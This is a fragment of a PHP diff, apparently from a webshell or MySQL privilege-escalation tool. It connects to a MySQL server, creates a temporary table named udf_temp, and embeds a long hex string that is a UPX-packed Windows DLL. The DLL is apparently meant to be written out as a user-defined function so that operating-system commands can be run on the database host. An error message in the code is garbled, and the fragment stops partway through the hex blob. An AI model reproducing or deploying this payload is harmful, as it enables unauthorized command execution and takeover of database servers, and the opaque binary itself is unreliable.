+	$link = mysql_connect ($mhost,$muser,$mpass) or die(mysql_error());
+	mysql_select_db($mdata,$link) or die(mysql_error());
+	@mysql_query("DROP TABLE udf_temp", $link);
+	$query="CREATE TABLE udf_temp (udf BLOB);";
+if(!($result=mysql_query($query, $link)))
+die('������ʱ��ʧ��'.mysql_error());
+else
+{
+$code="0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000009BBB9A02DFDAF451DFDAF451DFDAF451A4C6F851DDDAF4515CC6FA51CBDAF45137C5FE518BDAF451DFDAF451DCDAF451BDC5E751DADAF451DFDAF55184DAF45137C5FF51DCDAF45137C5F051DEDAF45152696368DFDAF4510000000000000000504500004C010300B2976A460000000000000000E0000E210B01060000500000001000000090000010E6000000A0000000F000000000001000100000000200000400000000000000040000000000000000000100001000000000000002000000000010000010000000001000001000000000000010000000D8F000007400000000F00000D80000000000000000000000000000000000000000000000000000004CF100000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000900000001000000000000000040000000000000000000000000000800000E055505831000000000050000000A000000048000000040000000000000000000000000000400000E055505832000000000010000000F0000000020000004C0000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000322E303200555058210D09020A459475C59FCC587632C900000F46000000B00000260A00BC6FEDDDFF558BEC6AFF6800007148040ED064A10507506489FFD8FF9F2583EC0C5356578965E8C745FC0F7D0C0175236A00FFEDB77B012E05B008FF150970008945E4EB09B81E7363BB0124C38B2FFF000F8B4DF05FF6FFD94E0D5F5E5B8BE55DC20C0090008B442499ACFDF604C740081C100432C0C30F8F58FDAC7D0081EC8C090592C685E8FBFF77DFBD6100B9FF1733C08DBDE90DF3AB66ABAA33DB895DFC8B33DBBBFF450C8338010F85770380480439190A6C53EFFEFFBF80988B50088B0250E80A005DDC83C40885C00F84511A889DC8F6F720276B414EC9F6C785BC0A9FD9DC5D0C16899DC0090FC4D853A1FBF6DF8D8D1A518D95CCFA06528D85B80D500EB399661B2C256C44246CCDF7EFB116288B852A8985ACF605A866EEEE8C6C559C985668050134776723CD95C852240CBFBA8883C9DFDCFFB7FF9CF2AEF7D12BF98BF78BFA8BD1100E4F8BCAC1B3CDFDF6E902F3A50683E103F3A4FBF2083566B604D88B393284B4C1B5DB60E6D8FBB153006A0103FF6B63838A538B20B4283BC3752D6A0A6D84436EF0E8FB1C4F473ADBAF3D7C12516670380B52E917059E0B67B30CF72A18B9D0FA40FB0E72106AD1FA6803FA8D1D93CBD8D84268FF14D0FAC47E0990583A548D64D9BA6F3EE5117E8BF089B564B9535EC803C2993B046AA18BB810CD2ED81B0E567420C63C10FFB9E53B72C6000163E8EBBA1882FBB7B9850436D41105B0596A206A03049D306B6E037D7EB2BF0CF6B171F37B6883FEFF6A85385618DCEFEF2D94F889BD408D4764A80FF652F1DC2F942DB9590C89036A9D5679F8CFBE564F01515030108B13C6043A0009446C03E40BD18B3BD9687E2C089318580C04EB366A64B66C8DC972D031745813594ECE0E53C16551C83BE920FDC91E498B5514890AE98B03E63F61EE23C368C80B6389500C3BD37C2939D8751A3233C07F3001BB709155357A0C83910DBB954511420C8651C8D391AC91AE8D513763F24C9552CDB0069B6CC2A4E96551C51C8B6C76695D530C1FA86CB243C27B0C298B5BA5C3A71B4F08A40F8B400C8674DD5B768C07BC91591B00130BC8AEF1B72C1D750683C8FFC2C30E05DCC030D74E060C74092FF202EDB4329054554468020217F6FEBFFE7134F7D81BC04081C41A5E903D814C060F6808B8640426B073A466121C866DCBB6417B885DA87401A902ADB17EE3D2B76603B58845B71684FEF1888590FFFE7D72BB06563F84BD910AE983CF3F4F9B2E347D942C6A02227175943B5A018CEDF7751616FC1708EC3F79044888FEFE71103BC7751D560A1BC60B6C14326A107A8D74235F61B8E73A52180F66DB8D2C2C88980B531CAE9A338FCA02DD827A1D0E203DB8C9B537DC9004B9827E8B3089CAB4D6D37CB01D80B471D337110CE748BEDDEC6F6A081AA8D177E6489E04A0B6138D55A8E327325A00438D7DA883CE2D656B0763CE457537E59B512FD8B7C1028B8B8596504522D9BE1B6144418D4DA885C977DD1696139C2E06249C238D472834160750D28954283B70800CF2C67526537547C84B6CC025CF070D048CFFFEDF5EBC8549E4200866E4516A28AE11DB6E61BC52F88D2072229D489AB3985D2C1D8B35781C88D11B302A6C37DF5968311659FFFF1151BE82B96D42D6FC84FED51052D985CD06A5091CEBC5BA94506052022C069E0F3981C511788FA404FCF68450228B75087CC0807E09060A4B775B71A85F8B5E0C20D469D9D115CEF92011C8B80D124CB6177EA98AB6E00FC1E0028BC803C604C468141ADF02CC33C98A7DBFB566FBEF5E4CC1E102058D14018955E0803A4D4F586F8F818BB9AA01CC8BF2E266F3A7ED0CF26C164102C0159D0542D875477205B04C2C3908C10D00DA6E0D67EF1968D007001034E90B8795BC59C82DED1533F607B80774C03FFB9009C183C206298A023C2167DF7FE9743C843B1B3C0A741788843530421B46D889846744EBDB7FB907CABBFF6F29B6B53C33D2F3A6753B88954C0BB918D962C860784DB34C76739038C0B10B6C68E803C59378271EEB254A1D8E236534B0301BB135728144C60F4F9400D7493C77C7030B5E382E81D8BB7F1A837C2410027513060405750C5B6464046B5F23C357084F179213C888140525F1ECA263810C5456C9134CD8C9C22CBD4FE485DBCEE499566BF6CFE0FA8BCB2BCE490C0804904BB80768042700E0FE397221F724434558E0FE8108D87B96002F8BFB1B2A2327837CD98BFACBCB5073BCC8855098E0FE8D6FBFAC03B7B10DCC63DC0DAF234B21D18DC47AF02AFA7A568F638FA2C0EB0C0354AD46F2C505EED48821B01A60A081C4112684C3CFF4425689FF3B77D77857040CB911280D108D7C2418F3AB8D4C243B0D069B6C1451AB343101BA0B041B0111E5724E64F06650720D553D8755FD04BA917466380E6E8D542408D731F62D925266181108435C5C8F4F4A761850514F9481106A5CDFBFEACC4044076C1589B424809674C67652DD247C03788C5FB65E56B87B49BCBFF0FF255B3CCCCC8D87D4E1674755E7F0FF42DF86C00D5F613C5D6C7904F74104868B23B8065423740F795CEFDCD7B7A5108902B863C33E1210506AFE5C908E7F40F864FF35A900198E1AB52529582FDDD5B4BFC0ED742E3B932474FA34768B0CB38959BD2DB50A02C304B394751268F7DBBFEDBD2DB37D0EAAFF5408EBC3648F0543236C7286EA8C1A648B9C8184FF83DF7904687510E3520C3951087505CF4D05BBFB5351BB1E18EB0A082489DFDCB7B64B02439D6B0C595BFCEF56433230069F0BF758433030F7A5FAFCD82C10DBD10C74F740E42682B58DD63E3F45F812E11B8D08B67F97AD3E21737B08C1618D0C76B18FEA6EED5F744556558D6B10A80B5D5E410B33BBE85ED633783C25534F0DD41D2B38D3AF560C0E168D36B7DEDDB6C5648F358F550C3B08C77EBF73301A8B348FEBA1B8DBEB1CC9EB15884DD67A5C003F5D16466F684394BC3B8B298B419FCC256BB4031824E1D763D9B66E20CF56BDE8C0E010E24785ED75EC423C0AE0DD5B0D1A7E4DE47F34168D5AFF3ADD766B1B92784D1C8020770D2450EDC3FF4884157559598BC65EC9C3CF8DDCFAF7D7B26B71151008C3B7E0772212C7424B4F0434A759913916BDF01C6C7410131E97DEB2C3568BB5FB05D7383B42565777216A091C1FF8ECA245FBA424020C91EF2059E1DB46ED38CEC7FD85F675032863FCDA7F5E83C60F83E6F056887CA4BCC65CE23B3A6BFC4D5716F6460C4074ECEFB75D15660CB2174D29730510B35652F790357329C54E308374342411FAFEE42B502AF7FF761007176F9B34F5DD7D0525EB128B461C530B5FD2A4D87B1C0059644B2A20B25628752EE34A467A86B386F62C591AE1D81E2DFA85EFFD0A7C092CE61D90280DE157F8ED397D08470F94C0485BC31630077AC31A6E5DF1025B5756391803BA23977D6097CA146A401A0CB8CDDCF7039B4DB4DD40743DFD6E78405720AC597B741356C220D7843337E11962410B5957B4C5DA2E6018CC07835328D00CBC3010E326ABA73DB884FB1147D903CB8BFEEA5A8A4614B8F01759C93A47FF7704A94949608563EF1B385B5E5FC93A00513D7DBB8B3B1C279772148111222E2D10B5B73FF685011773EC2BC88BC40C8BE18B596EB4A32D685036C10C576D747A9BF8BAEB74D9C614F7C64D8B197507F8B77803AB756FEB21F646880747497425FF6BCFBA26291F75EB2D1D5183E303740DEE5EEF66201D2F4B75F38492C3F7C79ED9E0FD2874123AFD8A116A9B3BE93AEE6C182EFA2AD1DBC2F6C82E89FEC7D074AFBAA5DB2FB523FEC70603D083F0E8C28B4F78E1BFF5C604A900948174DE84D2742C84641EF7C26FB7B7B90F580C070875C639EB18818C34DDA3E272090E00046A2BC45A88533F550A3B6CF7EBEE075F75F8B07585A3CCFFEFDE8DC6974E8A11F161698A7101DDBF2B74644F7719148A074638D07415D90BD3D2A573E30A0A75F5FC5F51E242173E10F0078D7E436102FE3B2A50DD4E1DC60238E075C48A410376EDDDEF31188A66FF83C11074DFEBB12F348AC26B74851B9030F28DBC0CC34C05C7DB88DFFC83F8F988CC078FA7DBC668BEA3068E58BEB2427EBB8EDE3CA10E680D075925DEC12DBDD1F7FB12102760891664950803C1EDDB50F3375C32F7750940EE78769BDDD8EB7256641CA4C03968098DCC7BB3D96D345204371B366231A8FF0519627F7FBBC8EB3E6B3BC1752C390D0D7EBDFF07E6FB0AFC0D8E90E128E6320E175A89D8331A64FBC25507514EADD87E11B259BF5833A569A363097D56B457C7105EBDC0D6BB09833D482926C101740547D36EA3040322DAA4C4E809F4AED9996EFFD0080CC113CC04BCB6D410BF4E0F07EB8D01C90C4C6D6FB0BB1737575023F6467926A315ED8034032125F71F0117396C115B083C5BD8B9E241C0D01A8DD4D8B1AE6176BA310E97D801DB78C041E03A9A3A3AD3C57DCD2A7D3B8130AB756C462D6C36BE025E10A882D2F6A840B9EEDAB61BED074AA96604071017DE6EBFF77F3F4E0824FE890E89462F1883657524EF0337F72D6E66A90C0115F981FE8B03BFC75A289C0748750BC03F32AE6ABFFDD7073E3EEE5966F7270801577467420BDCB65FAC3E2BF88D48390E581849A489DEB99EF04E047E10053CFE53DCEB3683FBF6CBFFDFBA198BCB8BC3C1F90583E01F8B0C8D93808D04C002B6F4B2D08196B88498F6F320F399B156A107783A260A4B2CD15C8A9E88E614B7C0C24A0D74885507DF40A12932DF4E0C20EB0FCC16B8760C7CEB080DC2C1C8A50E864C17064802DFBA95A1E6798A1F09DB8975F411BAD06E02EC890F0EF406D1B705D74A8D370641D00939554ABF7DF7EC0F8CDC1780FB207C1304787F0E0FBE50152EC08631717461EB02F8BE2DBCBB0F84C60E94C1F804A70789D00F879A85F652EC30FF24901DB2834803CBB22CDB55CC02D8E0E4FCDCBC6DBB4D5D1D954883E8E43B0403742DC1B55EA20B1F4848840DA8D2C56E6E594039FC082708041CB28C1D0111808002C3128E9EFB2AF9B9509B687613661E6CC80F8D12469B89985B8ED80E27B476CBB2ED170A666C4441D0EBE98AF03EED5C2E641EF0D305BF30E7CE63398D0489361B346FCBDB56AE2E046874206CB880FB7790495E2EA005804DFD10EEC6FFE4203F367514807F0134CA4747271FDA628680771888D0AA8568B7C6ED0D1C0FB6C3F66601802291EC50147E06131E28981DCEB0C18DCC35EB4733181652F39BE127F8670F8F1CE508650F8D9600F9EF43DB5811EBA9847817E8430F849FB96D5D836D70036C100CB8E903AF74A146C6BE3008CCC08B25430BFDF0BD68BEFACAC54BC21921D0ADAED4DEFB894DF844E7B1C92D0E2DE47EB981381229DC7477B37D212AD64E85D220D466833878869FED5DCA094040EBE721CC80C320136B1B74AB408FB8FDF3CAD14DDB955F708DCFF3F006CB1A0D8DAFF1660377862E8848BF578089043A953F5B008DD1D6C5F490323FD80C298EDDBEBDD35A7432040974C5487CE801521C97B3B345FE3A6C59882AF4471A183147BD2002BB8916359DDE6F2CF64580D9CCB97F74170FBF00D1E8E369E652D7D8C3AD2DDC000CBF0E94AE6DB4BE6E81344D50C28D8314670B2D826B25D5165C50CCA2B5AFD483C05E08F05D4B053B6C377540FC0EBCC8D18B851FB082B8F7855082FCC9C6057EB581E69E741429F0003506BE67B324205C595D12AF788432611654562D750DD0C2BB653A29BDB9E06157A758888D8459A619694899ED2C1D0C059E0684B686FB2C805184FD331B23B1CF05F77491C9C15DD4273C602621F62BC1D1F847FD340BDB0582F6288038AF03ECF1D728176B2624FE853D6B2815CC074DBB7B10D410A6FEF65D8A13C645EA3004516377CF60DF678845EBEB4821083BC202EB35D6852E09971B209909669F08CD2DF0EC668909050706F514EB0E296A403C0A69BF1FD6A05FA53A7959EB413D74218519637405404A0C0FBB641B0CF6C099EB250BB7C8F220AFC0ECC908EBE0070E19B8F5C6DB741BE37F177C1AC073115883D2D6E2C30D9FF7DA698BFAC90B1FDEE0B50577DC83E700B27D09161B2D08FD1B2AFCAA3AC0B6FBC60BC77509E40060B733D6DEADD55E614A7F0619EE0F765B5DFDF4995250578AC009C476409C5FDB6E372AC48B66C33007C017112CCBF6DF063E39677E03035DD440F8F847D75CF78818EBB5502B0C027F02A51AEE9B03611880393075A90A009BBBEB24400FC601301A98D825DEFEB1B6F4935DFCF6C3D226F6C716CF5A8386068A2D5C0F0A2BEB47369A970902740B20C1E475E06035B6ED2B75E402F4180C7884BDDB61A91B201EF0C41011CD7C37B703EA1402E45015342C9001D94C3E3104306F6B97DA893E7441058B7EFBBB0B97688E3B78FFDD034347C8502DFC54A443DE9D7E328DE9516EA164CF3B1759984FDB962DD802C7155802F4F860A50AC977AC79A5D7193808FBF97DF729B3456313F9E86DEC99D334B75BE01830031706216D30D1354DA4ACE11B7440C6126F55424F490478DC11BA6D6C74898A02FF0EB6300BB90233E098006C4E9468254A90D68C71D8A3AE4A83B557AFA9E0B06AEA7E21B618B714AB63DB43B9833E0D07207FE3B5B628B5908B5CE81A4BE6775DD73831263C1C35100FBE065746CDE7EC505F363FC34BE26D6C3C72BE9F580081008DAE0673520C083B4163B3A177D951FC1C661D6F8DE0B474E8500F41CC5204B4702D700B30027114E0550798688478EAA3365283702294BC5DF20D50600F6E85C0750F6C60A1FBCF373E5333DB391D15B4282D5DC3431B267E44D8B8013D0E74FB768AED8D700C5540785BFF36FFD70810E0916D800A6AFF7604626BC75EEAD59C14433B487CCED915DB812D1BB81D785DF6568CFDDB41DC7078158184FFD6077415CA2083644457D42DB983867CBE100A06FE2B8F3C763BD13474230774741B647413A8AE012344D398367B845CC52BDCFF007CC45A2067C106D76A07845D1003CA44F85083EAC716DE3C856C6C3407753E576A181F3B1A1F3C8BF8D4336A113542FB8D06BC59078C08005957750ADA0E78B31F78893EEB067A1D84D9607F865F281A805E5D60FF57605AA8B11584CC40A48B4F485801B7B87501172BC5D86E2508B00006B41217B770A0FBACC70505A48BBDA118AD96AFC18DB107B88858F0E16FC47314B5042B500C81FAB27207DB210C6FBB14EBE8EC321C556E34D5880C2E6A41DEF22BA3DF60A36A5AAFC2FC57C1EE7F37AA817FCE8B7AFC69C904D24B448D8C8E1A35C50144695D695685463BF80C13F6C1012E757FFDF4B46FFAED3F495F0B0C3BCF76038E8B4C13043B03BFF84D4BF4486783F920731CBF2CD3EFBFFB5FE88D4C01C4D7217CB044FE09752B752139EB2483C1EEC15CB0E01E2D21BCB0C4124AAEF174240679F04D42ADB519DB55890A040803630DDAD6FEBB088C8BFBC1FF044F83FF3F7B865F2F5167A8DBBDE197ECC4422BE20562AEA711A188F8495ADB5AF7E6A464760589F3CA411BFB40ED56E09F3E3BFA76028ABF746B2E9101DB4C69BE51BDBA16B9E491EAD22154111E96900F0BBDD221944C72B66DB152BF49BE4A0B04658BD6CA0811910EECB610F9D40939B68900B2F9295B73DD1B0B26892F0E05087FFB652B974A638A4C0704EF20884D0FFEC1FDEBE2BB880B7325807D0F55BB888BCFD3EBD81A25DB7609190DECB109B10BC436592924DC4FE019D821B8672559040F9D84B7F0DFC0F009388B54D0891A895C13FCFF086BAA0FB348FA4EB09CDFA6AFFFACEE0D0DA80EC1E10F03480CBB03B159E9581653513A1F32068B3D081C0950080E3940DDCDDE0D31A4886C570FFE48431C7BC39F0A481080794313836004FE118378D65AA61D106C5310785A124642882D0910C9F48D72F5388B15F21430C1C2B146DA282BC892110AD307BE708D48145170411C6D428DF767FA85B43B05223518BFEEEFD81496B88905ACEB0324A3AC8935B0493138532A6627F7AE142F68578D3C822C1B8E0ED3C6481776F0176A4934000B6FD57D0E56D3EE83EDFFEE0BE0B899EB1026BE33F6D3E80EC62D3E173049AC0F3BDF7FBF5D58E20873E14BE13B232B23FE0BCF75DDAE718B0B24143B9A1872E707756D26E4FB798BDA3BD8261505EBE6740BD7A019AC24C2837B3C3BD72A68891337EBED2681397B870D1B2FEEDBC8DC7646270B7B85DB90530E61DBE2F6BC595B1089FA43A8386C75EF6E6B071BE91406891DA5148B886F0BB016FAFEFC2D8B8C90C4B6B387FDAD904488378B127011557DA1A156DD1F000E440BD68B563077BF0B75178B91841CFF45FC04BF35EBA6FFFE23390BD774E98B97CA33FF5C5A741B87584D764C57CEE68DBA12C166EC645F9DBAED0AFD7C05D1E147EB752054F9430A2BE956EFEA7FF17BC1FE044EDE3F7EF83AC9DCB85E3BF79B0D0124617421206D207D2B11A27C383AEEFEB69CD3F3EC235C88448903FE0F75EA08B181F48E7B210BEB31172B5CBBC56895A1322119293673148215982C85220AA6D76593C07A04F80095AF3F4735D77A089084C5A97CF10348AD6D420CA522C264A974B32C06FE0B7D29C499C636576A0B331162BFB0CE6EBB64978C093B0A8F097CAEEB2FEF437AC0280D8D4EB6097B04B15C8F74B1BCAD16BEEE09376A2EB7F4AEF70B890A8903FCB2790DBFED56AE03D122011232FC9F8B34126FB70E218D790F3E751AA9B0A011A92BDC4B3BA406A49772C16B119C8D420408A1C41769A10220A489C09A6E6D44B6305F89507250D401E924E15797903B319841A10B889CC0930BF8653DB868C4411B45CBD81233305C81335C89834517F04610742A1B20655783363A63198CB014BDA5461C586460B47CB1856EAD4E24C5897E060562244A196A41B98BC36E74F1E051DF3771C84108343B5A2DDCC54FE043C331B63E6E3769C0815AFB3082C3026CB745EA40080204DE4A1E88D0AD5BFB85C1E7DF790C47A68686BDE88B3B08D13768ED4D2728B28D97101342773C47834BDB8D477748F283887EF4368379778D88FC06C740FCF0420EEFD0E77E01C24804C780E810140517EA0D7E3B48F09676C78B744F0CEDADFBC405F8FC015F2689AC8D4A0C087FB8BD6C8F41649E4442BC9EE38A46438A6F75D78DC80B84C07A884E43A30978047050608CBA2CCB687EA5266189BDC3ABA031BEAB17B614AB5ECCB80002BD063BC67D07EE07DA5BA319DB134451590D8DB535C5949808211256F4A0FA648B9018E21A33C9B874EBB7193D601519890476C020D46CEFC0D50884887CEA1CBA187C8A05A09A5BFE1134B5E055539F8B04865274C3F02F5E586F0A20C220418D82787CD1AD76BBA8A29BAC80448E8C458D3746DD05E97ADEE9B96A61A796EDDF72175F6877102B56F8C03B75466E436659C37CD780A065A52718F8141E1E722A5B76E9225120592139250384205934F449A884E2948073382CC6A1FE435607F644810401741D57A86F7264B348442A7448A3FCC6CF50E245D2C775C00ADB83F4E16C668AE85C39023A3E046A9095C4166A02CBDD6BC416264B1F593BC71C196610672B59CD696F29DA19821C24DFFF1D0A05DCDB4783A383E61FF3EF8A0635FAC7A40CF68064880400C60851AE70BF7F5F597D0FC1768182434EA883C3A8FC63B4B42A197808CA6681660CF7FB3360DBD2525E06900802042A635FC5A8648605C2F6FD1FE5EA460D409C6C48C5F7D8595E1B4B5F015E991B2E0C8957FBF609705C8080F9D53766A908E0B36F1368317B907E2657503BBFADE0401BD00E8B8074DC0DB4EB0E24FD07EB072483CBFF30351A9B81EF8B5FF6F5C154F85CC185B5ACF1279788D15A63F90E7A593917EDF118D97E74A1BBFFCDA30AA57A745FF6401D32AAC18561ECA218591A8517DFBB806DC11830AF01750F505222BC80D608851D37C597B58E4A50FF028B1A7536B654EC020BF841CEB04FF44A9DE370EC463B737C8CB1423914D98487B70160C37402FB5B36E42806FDA08A7477A50538839E890BA9639456E1A05FD68E48A06017858ED552908E4C6B80C4EAAF3109BB47752053951FDA5B57F7079E8D4614759F0658A54A340BA518EB56044261DBB65E097E123E0704C53F7CD5E1EE02115B5F5B5E95DD0001C3A150DC9BBA831B0B3F6116D080660DEE6118962668025B6C02664959538926F4317D0FAF7D10012334068B5B078BDF3C2E9A45D7CE0AA8AE74157E457AFB96A27C4014A78B7781E10868B1ABEDE67429191174229580AB1616697212F863F186A53FA9495C297E393EF62BDF017D321EBC6CD046147246CD63DA56A250177A4E74D391EDADDDBBD2F76B402BFAEB42FBE3F66B1935744701982BD83F1A608976723EB00729D10F234482252450E9D42E4AE0BE169FA44BA586D8080CF1A7264385F0385DD08157106F6A23B633A465C72B7483E7FE545B3CCF56C179148A0141CEF06CA387400E75F1B3ED814975AA01605E2CDD0623955CE88AFC2B32B9A7BA51C724A95E1306B6F57EA30719EBCD8D41FF559CC309824C32C9FEFDFCD126301C8687398FA4DF221A7A0BD2F86E8A073C61051BB4F4741A3C727C3CCC22BFD1D675FE0192EB20C99601EB08B909786157731209405A8A1D473AC31DB46DB6B5E33BD307DB60BEF652DB85C016547F3E601A2B74450475DBD6F21974360E61484CAC1F39FF2C98AD6108A328FC83C920EBB72F7D2063148E10EBA22240757D0BA54D6F0940EB982C7573E993E6006EA0B7FC0F0281CE0DEB82B8BA7D5C782AC8860BC834DB656274BE8BB60DCB2E070B42067540F6C5B6B7D8B7C73B80CD401E63F8752E5FF89315FE0A37E6FFBF9B16175DECD521CE84163A741DD9621B8DD20B418068A4D71362C3242210EA4C917EA9543C7DC4103BCB7D701A2C68DB12B73A896A89588018040859334A6C021C82005196FB871825A0590F8E9D7855AE209F1F3BC374377521509175ACB30D1BB16D14501D16E97FEBC4EBBA3CB1EB446A38C1E602C23268066B62600E56063A65306C327A7815DE4B1B96B3273CFB384F108C5F58DB56B604020CBF1F041C7EA1819D355975CC00D885F6E36DFF118DA424AB8D6406075AD5AA838AE5531FE0FEC7780B3708F7C2DB138A0A4238D974D18437EACF9683511275ED0BD857FBE310281E4BB5560893BFE5F8F18D6E5D33CB0365F983F1FFF0CF33BF3F4A3770C204EEF3751C250674D37F51D83AC508C1B475C45E357E0B5A808C8B42FC38D867A67BD33713EF38DC742717E7C1E81012157BD66E9ADC06D4EB962DB142FE377A38279D06FDFC0494C36B20EE5002FFD0371404E634449EEF32AC0E0400F3C3F32CC015505431F5DF64B1025F0E57299A11FC45438A3999947511064E18C1096C987394302FFE36C50C00E714892290881DC2F5115EDF753C8690D7C58C568D71E2EE112F52F07213AC9A83EE04883CDFC7349073ED5E972018AD20CF57A1102824851B7B7F8D5BC50BA35FC3816A9480BC60711B88116A0DEC08B25DB038E194D7730D70F6B55660C6FB6A192A6339BBB1C935A4F6C08490546A74E2A0D18E50ED8BF06B7875239F5A93565B8490A04018A50A8CFD37333859109C0462BF193868305333528CA116131E782F690E182FD118D1D80D41C3BB505244A06D10F00653BE5660368B9464F20D1CD94730B00D3F8A26684BC9911588EB227536D99B1059ACF545305BC392D09113D0022FDB610D506E746CF12499906D19450D283009999009384098EC9D9044503DEE10560B0EECA4FC00CA5E4F16D4E81A48506896046AD2546CF4691B8DA62874879FD9942100DE784F9B862947731E8085F74FECDD0EFF8BC646050AA127E253F4A8DF24051FEBDE784B518CBAC46620EA001F5B9B86281ABBC6388DD98DDD02AE1A81EA7D0851F8BAB787897C79E3677D56BE4C84983D04CB930D83839A1F6B556AC082C1731C806008F6D6A55960408B0E882481C1806DF5CC31E06D4D7CB76E8B130D1588092ACE4C3B04BCB1508BAAF926388A03BE126DB4BE32527572AABC04ACA41A4123404AFD37E0487D8B0989088A0B88488F05BE558B0AFC3BF77CB485016FF04E5B23333C81FFFDAD50BA3C754D290E2F75056AF658EB099B09BA92C348C397F50DC96E1BD0B84AFF7A175770340A9D800C5B0A25C1068D1B9906804BA40FEFB6700D540A0A700405804383FB6130F2E1037C97B89480B40638B491DEBE7B5E375778A8F0056E4673218D70837BFC00FB7DC26DAC0B7C2083C79683C324C8D00CBA2072E2854824720F338825B85473C487A01D94885B155434811237F8D58DCC6B8A069ED218A996783C3D74A756FA8DC26D4B140AC3E8F9BD581D3F9EF1C63B3BF3318E74410955BF1D267B41381F74395583D8ED8F348BE85945803F49225534521DBBCC54C02E579D4F6C67C4BEFD9A5903FD3775C95DFF84C28934C768BF1D0B891EAE9484015BA2BBB25983BDBE8A98994FC1A75456530DC0A15A84E38FA2848BFE3818747463A5FA7DA307FC5053539F37B4040B0CDB05C90488D486186DD8A46BD6A1082F2700C34A7424864635A6A08D355F485A6C9C9232B1458A68B14C18D147EFF317208321008B7510C700B50156B0802BEF4937A05BFFDFA0AE80382275448A50014080FA22FE84AE1B2FFFD274250FB6D2F68292610425FF012B3B3256FA068A108816F60BD5EBCE0C6E6FA11124CB46401CEB43F2B645C61E05044044DAF683D6DCFD5B1918881E4665207409090870ACF5F20975CC750348C34A66FF9A5AA946B5674EB5E003F0BE66442B052787A281993117C8BC15CE169739FF02FB0885FA5AD0B8225C75C8DA922C7FE1C6AD02752541397D6D0D807801228D86257A6BE31D8BC2EBA3080CF0DB770416180F94C28905D1EB8BD34B88F6EF02F30E4388C6065C46B16AADAE355980A74A4693682E4C67168A3F863D1306ACDBE32E2819E2061F7303C2091B0F400315016B43F850BF38A0300F0E95A9E1EE6EC70383278E140246DDD1306449258F9C5378446DA830D4E06CF633141A8DCD4D04D50E0B49180F407B7B21892858CC428BC6D047F317EA10C700CE1B02433A45DBACA33CE581430C3F27C2BDDD5A3766391E6AEB4040081875F96DFC419F06F22BC6CFCCD1F88E40DA2A5AA3025D038A345852EB0DCCE83BEBAC3213B75683C9AC1C55508D3A57D05C242521D20C10CAB56A90275C2703F6756B0C92C888EB53624CA54A0592B985B1566089DFF6858D740A40387BFB04F62B223760495B6A55CE03F6EB727180A50BBA560F91E248D0CEBAC4BA9E5D5B20070261ED572A381026E821681A536C106A7450A213FF153A152B3859450C163A448330D4653B5BB95BD0D7EC084144F77CF0DE6889F134F18E033B961ACCC230B7471C2A6C45E8F75437E9700D10D77AFA75037A08B60BF18F5CBD59A522560055016B47C1BA30131750E0506DD65B3A3B591257D9BD07A8D6D90B3040963C76291950BBFDBE7076F80D838D6A0303F841DC5739B99D10B3105560FFC05D36763610570C7C1DBC7D36EB9E10FFB6D3C41611681020F8F6B9ACA927945450592C5FEB26165A6C81A38D30C7F23612B1DD0482086AF4D56CC881110FD85EC90E40C128265325F34226D911163C8B14C0012B0C8329EB2D3983D71C90A756F6DC784CC8D5EB7438B125213EF950E99ECEF2B2D61C11A9AEA880643C287BEEFD8DAD8AD73D63F3831881D51404B03582AFB210EA02F01B61E0594E3EE9B3B68D4B38F7881CB50C80F4C025622BC08B03317E30641C5E45AB0EE3A24C96880D535B24C67C80066F04368EC1F10C5229231AE3AEF90F86EAA0ECF1EE5BD5416E2BB64D1073290AD62EB045A58A95F90A7409FFDEBED0F02B0D408808EFC88D95292BCA81F9883D3655127CCC8911DBE3393ABFF4130D6B71FF85A061C634300C6343065FB6F6D20145E8C77C0B0964454510728A9960E96DD98B134E90464868B5BF8B74626A055E39B51D177F2126FC8930EB41B456EBC78D4DF4575CE6BA01B310FF43640B2EBB51CED14FEBA72C9C1EDA241C06E02C9720405AE8A015F52CEA1A10AA6C4FF24D666E1C38EBD2A4F007458258DF02F1B516CC808C6E6DFDFEAD068E6583490C08C741181BEB1103CEDDC80C494114181276D4525CA25E83618A011AE0188DF93B377203DCC883E17018AF362C368AD1A1D81C331340E58CC009FC7591345730E486E0D55BE159519130D716D76A138E1DB69AE51E5B00DE3FB41B155A22DD0CF3A00AE11ABC7A1EFBD82BD7246046735A732844BF5A020BA68FCC6C5DA0702B700C66C8077739D80A6DA14BDD581A58B26575F1A436CF51A08B84600C33C2CFBD1A506820CF118FDC6DCCCC208C4106F80E3A2AD716B6195F41CC00CDFB55B88A6D180B7718CFE8BA37C2F72AF18BD8090C07D31139A050D60C3215FCFFCF4913D1E9D1DBD1EAD1D80BC975F4F7F3B014B9B684643D2150F7EDEEBB2F7DD1720E3B27770872073B2B76014E4C4B56D84A7FDEC27F6F2A0E7AB3D96E506EA833B6517405C203506E10DD66C85E0C156EC814910410BA37CD606B0C0E0876082BBB1B406CA6DB11140708BDDA264103BB27DA007C3F26A8742AA6443D71A376E9C18BD1783BFE3DEF0F82800E036A738314ED6F4BDC8183E2EEF95E29F3A5FF249513A9F1DFD6426811BA1C83E904720C0CB136DB8F62C86D41801E8D789075F3B9C70741FC900403BCE023D173DB852F1188078A46BE470105025608938C2D5B59C6C75CCC8D96652CD949002B25010202EBCE2679A690234621473F5DD70DE48C065F034C0744374DD3343C342C241C8B44344DD3FC8EE489448FE4E8E8ECECD3344DD3F0F0F4F4F8CD39324DF8FCBDD7007B87B01027F809FFF00305399AA6808CA0BC6C36B0D766909D0BF91133240417A30D0A2BB8555B0D2531C639FCD8F692417F240DFDE3FC77823BC2E54400F7D96543B04B8F779E9C1CF92B43082CC2D6745D900B180338606D033A02F275B76F034E584F56B6B74B08F6971FA3EE02EF026FD9807C298C902724E3952D09AB2D03AE45EB1666625A955B7FB403A6699AA6BCC4CCD4DCA6691A9AE4F7971C1C189AA6699A18141410100C699AA6690C08080404A6EB0E231F05100318E05